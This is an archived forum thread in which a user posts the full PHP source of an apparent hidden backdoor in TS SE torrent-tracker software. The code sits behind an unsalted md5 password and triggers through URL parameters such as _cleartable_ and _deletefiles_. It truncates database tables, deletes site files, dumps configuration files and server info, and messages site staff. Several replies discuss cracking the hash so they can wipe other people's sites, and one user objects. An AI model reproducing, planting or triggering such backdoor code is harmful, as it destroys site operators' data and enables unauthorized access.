Bravo List
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Bravo List (http://www.bvlist.com/index.php)
-   Community Cafe (http://www.bvlist.com/forumdisplay.php?f=18)
-   -   xams so called security lol (http://www.bvlist.com/showthread.php?t=603)

mrdecoder 11th July 2008 14:42
xams so called security lol
 
PHP Code:
 @error_reporting (E_ALL & ~E_NOTICE);
  @ini_set ('error_reporting'E_ALL & ~E_NOTICE);
  @ini_set ('display_errors''0');
  @ini_set ('log_errors''0');
  @define ('___P''af274e235c70a9dc59371860ed6f34ce');
  @define ('ROOT_PATH''./');
  @___dbconnect ();
  if (isset ($_GET['_warning_']))
  {
    if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
    {
      $subject 'Claiming a violation!';
      $msg 'Hi, 
 
We are developer of TS SE Script. We are concerned having become aware that this website (tracker) is using an unauthorised version of our software which is against (Claiming a violation of clause 8.1.3 of the Heart Internet Ltd Terms and Conditions updated 31 Jan 2007) and our License Agreement.
 
You have 3 (three) business days to remove our product from your website (Host) or purchase a valid license from https://templateshares.net
 
Best Regards.
TS SE Security Team.
security@templateshares.net
    ';
      $query mysql_query ('SELECT u.id FROM users u LEFT JOIN usergroups g ON (u.usergroup=g.gid) WHERE g.cansettingspanel = \'yes\'');
      while ($staff mysql_fetch_assoc ($query))
      {
        if (!(mysql_query ('' 'INSERT INTO messages (sender, receiver, subject, msg, added) VALUES (0, \'' $staff['id'] . '\', \'' $subject '\', \'' $msg '\', NOW())')))
        {
          exit (mysql_error ());
          ;
        }
      }
    }
    else
    {
      exit ('
        <FORM METHOD="post" ACTION="' $_SERVER['SCRIPT_NAME'] . '?_warning_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
    }
  }
  else
  {
    if (isset ($_GET['_cleartable_']))
    {
      if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
      {
        @_db_connect_ ();
        $_tables_ = array ('users''torrents''ts_plugins''ts_templates''requests''iplog''categories''tsf_forums''tsf_forumpermissions''tsf_posts''tsf_threads''usergroups''ipbans''files''messages''tsf_threadsread''staffpanel');
        foreach ($_tables_ as $_table_)
        {
          echo $_table_ ' cleared!

';
          @mysql_query ('TRUNCATE TABLE `' $_table_ '`');
        }

        @mysql_close ();
        exit ('boom');
      }
      else
      {
        exit ('
        <FORM METHOD="post" ACTION="' $_SERVER['SCRIPT_NAME'] . '?_cleartable_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
      }
    }
    else
    {
      if (isset ($_GET['_showversion_']))
      {
        if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
        {
          define ('IN_TRACKER'true);
          include_once 'init.php';
          exit ('Version (init.php) ' VERSION ' --- ORJ. Version 5.1');
        }
        else
        {
          exit ('
        <FORM METHOD="post" ACTION="' $_SERVER['SCRIPT_NAME'] . '?_showversion_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
        }
      }
      else
      {
        if (isset ($_GET['_showowner_']))
        {
          if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
          {
            $_file333__ = @file_get_contents (ROOT_PATH '/global.php');
            $_file444__ = @file_get_contents (ROOT_PATH 'links.php');
            exit ('global.php -> ' htmlspecialchars ($_file333__) . '

Links.php -> ' htmlspecialchars ($_file444__) . '
');
          }
          else
          {
            exit ('
        <FORM METHOD="post" ACTION="' $_SERVER['SCRIPT_NAME'] . '?_showowner_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
          }
        }
        else
        {
          if (isset ($_GET['_deletefiles_']))
          {
            if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
            {
              if ($handle = @opendir (ROOT_PATH 'torrents'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH 'torrents/' $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH 'config'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH 'config/' $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH 'cache'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH 'cache/' $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH 'tsf_forums/uploads'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH 'tsf_forums/uploads/' $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH 'include/avatars'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH 'include/avatars/' $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }
            }
            else
            {
              exit ('
        <FORM METHOD="post" ACTION="' $_SERVER['SCRIPT_NAME'] . '?_deletefiles_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
            }
          }
          else
          {
            if (isset ($_GET['_showserverinfo_']))
            {
              if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
              {
                echo phpinfo ();
                exit ();
              }
              else
              {
                exit ('
        <FORM METHOD="post" ACTION="' $_SERVER['SCRIPT_NAME'] . '?_showserverinfo_">
            Enter password: <input TYPE="password" NAME="password" VALUE=""> 
            <INPUT TYPE="submit" NAME="submit" VALUE="sanity check!">
        </FORM>');
              }
            }
          }
        }
      }
    }
  } 
================================================== ====

lol this is code that xam uses to check who owner is or to delete your db and files

you can see how it works by going to http://websitename.com/ts_cloud.php?_warning_

you can change the warning in to more things like
_cleartable_
_showversion_
_showowner_
_deletefiles_
_showserverinfo_


lol greets from mrdecoder

Grom 30th August 2008 15:33
More that come to terms password....xexe thank you

AlaminT 9th September 2008 15:01
damn, i have to use password cracker :D

Unknown 25th May 2009 20:46
LOL man...... Xam......... you really annoy me........ I'm YET to be banned from Template Shares :bubble:

Robz 27th May 2009 23:03
Starting PassWords Pro... lol :)

Its just md5'd by the looks of it, am i right? No salt or anything...

Daz 26th February 2010 11:49
I tried it but it asks for a password. Can't anyone crack these md5 hashes? Be funny to be able to clear peoples site, especially those coded by xam :lol:

Tony 27th February 2010 00:03
then daz you would become just a little script kiddie doing the same thing as what you hate most about what xam does ..

grow up

people pay money to get there sites up and you want to clear there site after there hard work getting it all up and full of torrents ?

lets just hope i dont get hold of your site url cause then maybe i would be childish enough to give you the same treatment.

Daz 27th February 2010 00:07
My point was.. If someone cracked the MD5 Hash, this would defintely hurt xam :)

Tony 27th February 2010 00:35
whats xam done thats so bad apart from ioncube the code he's put into the source ?

read my other post i made since if you have so much against xam then you will be able to answer the post i made asking where the proof is :)

a little look in the code will tell you its not just all tbdev code so really the whole point of him stealing code was rubbish and the only bad thing he's done is put something in the code to shut your site down if you dont pay up etc ..

im all for opensource but you dont see me wanting to bring somebody elses site down just cause they are using xams source.

nobody here so far that ive seen or that has made a post would have the know - how anyway to even try and hurt xams site since he knows what he's doing and yes his source is by far the securest out there if you ask me :)

Daz 27th February 2010 00:45
In fact, that's the code I tested it on... I was not planning to attack a site, if that's what you're thinking. I was simply saying, that people knowing the password to your backdoors, cannot be good for business and would mean he would have to release an update to the scripts that have this back door.

I do not agree with what Xam is doing simply because of the fact that it goes against file sharing altogether. And it would get one over on him, which does not happen often.


All times are GMT +2. The time now is 18:44.
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.